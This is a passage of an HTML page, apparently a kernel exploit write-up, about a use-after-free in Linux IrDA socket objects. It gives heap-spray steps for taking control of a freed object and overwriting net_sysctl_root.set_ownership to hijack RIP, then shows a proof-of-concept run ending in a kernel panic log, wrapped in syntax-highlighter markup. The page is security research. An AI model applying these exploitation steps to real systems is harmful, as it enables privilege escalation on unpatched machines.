\/> &#8211; close socket 2, then 3 , this will free sockets and you should see the ias object of socket 3 freed but still queued in the list<br \/> &#8211; Spray the heap to fill the freed object with our payload, now we have control over obj-&gt;q.q_(next\/prev)<br \/> &#8211; bind socket 4 , this is \u2018what\u2019 pointer to put in the controlled object (obj-&gt;q.q_prev)<br \/> &#8211; close socket 4 to free the last object<br \/> &#8211; Spray the heap again to control the object<br \/> &#8211; Trigger the overwritten pointer , and you\u2019ll get RIP<\/p>\n<p>Here is a crash PoC showing that we\u2019ve overwritten net_sysctl_root.set_ownership<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bad57622f369705235707\" class=\"crayon-syntax crayon-theme-secrets-of-rock crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> .\/poc 0xffffffff81efeb60  [+] Freeing the first queued ias object  [+] Spray memory and take control of the old freed object  [+] Allocating new object to overwrite the targetted pointer  [+] Freeing object again  [ 8.641924] kernel tried to execute NX-protected page &#8211; exploit attempt? (uid: 0)  [ 8.642882] BUG: unable to handle kernel paging request at ffff88023623ad20  [ 8.642882] IP: 0xffff88023623ad20  [ 8.642882] PGD 212b067  [ 8.642882] PUD 212e067  [ 8.642882] PMD 80000002362001e3  [ 8.642882]  [ 8.642882] Oops: 0011 [#1] SMP  [ 8.642882] Modules linked in:  [ 8.642882] CPU: 0 PID: 1038 Comm: xx Not tainted 4.10.0-rc8+ #6  [ 8.642882] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04\/01\/2014  [ 8.642882] task: ffff88023575de00 task.stack: ffffc90001434000  [ 8.642882] RIP: 0010:0xffff88023623ad20  [ 8.642882] RSP: 0018:ffffc90001437b60 EFLAGS: 00010282  [ 8.642882] RAX: ffff88023623ad20 RBX: ffff880236c2d148 RCX: ffff880236c2d150  [ 8.642882] RDX: ffff880236c2d14c RSI: ffff8802349a0a70 RDI: ffff8802349a0a00  [ 8.642882] RBP: ffffc90001437b88 R08: ffff88023fc1b840 R09: ffff880234b61230  [ 8.642882] R10: 2f2f2f2f2f2f2f2f R11: 0000000000000000 R12: ffff8802349a0a00  [ 8.642882] R13: ffff8802349a0a70 R14: ffffffff81efeb00 R15: 0000000000000004  [ 8.642882] FS: 00000000023d0880(0000) GS:ffff88023fc00000(0000) knlGS:0000000000000000  [ 8.642882] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033  [ 8.642882] CR2: ffff88023623ad20 CR3: 0000000235e97000 CR4: 00000000000006f0  [ 8.642882] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000  [ 8.642882] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400  [ 8.642882] Call Trace:  [ 8.642882] ? proc_sys_make_inode+0xc1\/0x100  [ 8.642882] proc_sys_lookup+0xcf\/0x140  [ 8.642882] lookup_slow+0x91\/0x140  [ 8.642882] walk_component+0x195\/0x320  [ 8.642882] ? security_inode_permission+0x3c\/0x60  [ 8.642882] link_path_walk+0x18b\/0x5c0  [ 8.642882] ? path_init+0x1d4\/0x330  [ 8.642882] path_openat+0xe3\/0x1320  [ 8.642882] do_filp_open+0x79\/0xd0  [ 8.642882] ? do_nanosleep+0x92\/0xf0  [ 8.642882] ? kmem_cache_alloc+0x2f\/0x150  [ 8.642882] ? getname_flags+0x51\/0x1f0  [ 8.642882] do_sys_open+0x116\/0x1f0  [ 8.642882] SyS_openat+0xf\/0x20  [ 8.642882] entry_SYSCALL_64_fastpath+0x13\/0x94  [ 8.642882] RIP: 0033:0x44769e  [ 8.642882] RSP: 002b:00007ffc4d7f1b00 EFLAGS: 00000246 ORIG_RAX: 0000000000000101  [ 8.642882] RAX: ffffffffffffffda RBX: 00000000006d18d8 RCX: 000000000044769e  [ 8.642882] RDX: 0000000000000000 RSI: 00000000004a8a46 RDI: ffffffffffffff9c  [ 8.642882] RBP: 0000000000000070 R08: 0000000000000001 R09: 000000000000000c  [ 8.642882] R10: 0000000000000000 R11: 0000000000000246 R12: 00000000006d1880  [ 8.642882] R13: 0000000000000065 R14: 00000000006d18d8 R15: 0000000000000000  [ 8.642882] Code: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 00 00 00 00 00 00 00 00 &lt;68&gt; 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [ 8.642882] RIP: 0xffff88023623ad20 RSP: ffffc90001437b60  [ 8.642882] CR2: ffff88023623ad20  [ 8.642882] &#8212;[ end trace 531b1224dce05ac9 ]&#8212;  [ 8.642882] Kernel panic &#8211; not syncing: Fatal exception  [ 8.642882] Kernel Offset: disabled  [ 8.642882] Rebooting in 1 seconds..<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f369705235707-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f369705235707-59\">59<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-1\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">poc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff81efeb60<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-2\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Freeing <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">first <\/span><span class=\"crayon-e\">queued <\/span><span class=\"crayon-e\">ias <\/span><span class=\"crayon-t\">object<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-3\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Spray <\/span><span class=\"crayon-e\">memory <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">take <\/span><span class=\"crayon-e\">control <\/span><span class=\"crayon-e\">of <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">old <\/span><span class=\"crayon-e\">freed <\/span><span class=\"crayon-t\">object<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-4\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Allocating <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">object<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">overwrite <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">targetted <\/span><span class=\"crayon-i\">pointer<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-5\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Freeing <\/span><span class=\"crayon-t\">object<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">again<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-6\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.641924<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">kernel <\/span><span class=\"crayon-e\">tried <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">execute <\/span><span class=\"crayon-v\">NX<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-m\">protected<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">exploit <\/span><span class=\"crayon-v\">attempt<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uid<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-7\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">BUG<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">unable <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">handle <\/span><span class=\"crayon-e\">kernel <\/span><span class=\"crayon-e\">paging <\/span><span class=\"crayon-e\">request <\/span><span class=\"crayon-e\">at <\/span><span class=\"crayon-i\">ffff88023623ad20<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-8\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">IP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffff88023623ad20<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-9\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">PGD<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">212b067<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-10\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">PUD<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">212e067<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-11\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">PMD<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">80000002362001e3<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-12\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-13\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Oops<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0011<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-p\">#1] SMP<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-14\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Modules <\/span><span class=\"crayon-e\">linked <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-15\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CPU<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PID<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1038<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Comm<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">xx <\/span><span class=\"crayon-st\">Not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">tainted<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4.10.0<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">rc8<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#6<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-16\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Hardware <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">QEMU <\/span><span class=\"crayon-e\">Standard <\/span><span class=\"crayon-e\">PC<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">i440FX<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PIIX<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1996<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">BIOS <\/span><span class=\"crayon-v\">Ubuntu<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1.8.2<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1ubuntu1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">04<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">01<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">2014<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-17\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">task<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff88023575de00 <\/span><span class=\"crayon-v\">task<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stack<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffffc90001434000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-18\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RIP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0010<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0xffff88023623ad20<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-19\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0018<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">ffffc90001437b60 <\/span><span class=\"crayon-v\">EFLAGS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00010282<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-20\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RAX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff88023623ad20 <\/span><span class=\"crayon-v\">RBX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff880236c2d148 <\/span><span class=\"crayon-v\">RCX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffff880236c2d150<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-21\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RDX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff880236c2d14c <\/span><span class=\"crayon-v\">RSI<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff8802349a0a70 <\/span><span class=\"crayon-v\">RDI<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffff8802349a0a00<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-22\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RBP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffffc90001437b88 <\/span><span class=\"crayon-v\">R08<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff88023fc1b840 <\/span><span class=\"crayon-v\">R09<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffff880234b61230<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-23\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2f2f2f2f2f2f2f2f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R11<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R12<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffff8802349a0a00<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-24\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R13<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff8802349a0a70 <\/span><span class=\"crayon-v\">R14<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffffffff81efeb00 <\/span><span class=\"crayon-v\">R15<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000004<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-25\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">FS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000023d0880<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">ffff88023fc00000<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">knlGS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000000000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-26\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span 